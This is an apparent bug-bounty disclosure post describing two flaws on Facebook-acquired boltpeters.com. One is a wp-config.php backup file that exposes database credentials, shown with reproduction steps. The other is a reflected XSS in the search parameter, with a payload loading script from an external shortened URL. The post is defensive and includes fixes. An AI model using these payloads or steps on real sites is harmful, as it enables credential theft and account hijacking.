Facebooks Boltpeters.com Configuration File Source Code Disclosure Vulnerability
I want to share two of my finding on Facebooks Acquired domain Boltpeters.com which I have reported to Facebook on 1 Feburary 2013.
I have found that Facebooks Acquired domain Boltpeters.com Configuration File was accessible by crafting the config file path http://boltpeters.com/wp-config.php into a backup file path http://boltpeters.com/wp-config.php~
Steps to Regenerate the Vulnerability:
1. To extract php source code with database name, MySQL database username and its password, database hostname, database charset and database collate etc. Open the following Url http://boltpeters.com/wp-config.php
2. Now change the the actual Url http://boltpeters.com/wp-config.php to http://boltpeters.com/wp-config.php~
3. Now you can access the php source code with database name, MySQL database username and its password, database hostname, database charset and database collate etc as mentioned below:
Configuration File Source Code Disclosure Vulnerability POC Screenshot:
Impact: Configuration files will disclose sensitive information that will help a malicious attacker to prepare more advanced attacks. Using this Vulnerability an attacker can easily Extract Facebooks Boltpeters.com Database Users ID & Password.
The sensitive files path shall not be directly accessible to any anonymous users.
The sensitive backup files path shall not be directly accessible to any anonymous users.
Remove Configuration File from the web server. As an additional step, it is recommended to implement a security policy within your organization to disallow creation of temporary/backup files in directories accessible from the web.
Filesystem snapshots should not be accessible via the web if your document root is on a filesystem using this technology. Configure your web server to deny access to such directories.
Facebooks Boltpeters.com Reflected XSS
I have found that Facebook's Boltpeters.com application is vulnerable to Reflected Cross site Scripting attack as s parameter of this applications following Url http://boltpeters.com/?s=test is used for inputting an searching but as there is no proper input validation, filtration or sanitation on server side nor there is any output encoding etc to prevent this Reflected Cross site Scripting Vulnerability if the attacker uses the cross domain XSS payload with the combination of comments. So the attacker easily can steal the cookies(as http only cookie attribute missing) of any of those website users and can easily compromise there account.Original XSS Vulnerable Url(Reflected XSS Via GET & POST Requests while searching & by Injecting the XSS Payload in Search field):
Crafted XSS Vulnerable Url:
XSS Payloads: "><script src=//goo.gl/p2yht/><!--
Vulnerable Parameter: s
Reflected XSS Vulnerability POC Screenshots:
Both the vulnerabilities were mitigated by Facebook Security Team within 5 days + (Rewarded me bounty for my Findings).
Suggestions and Feedbacks are welcome.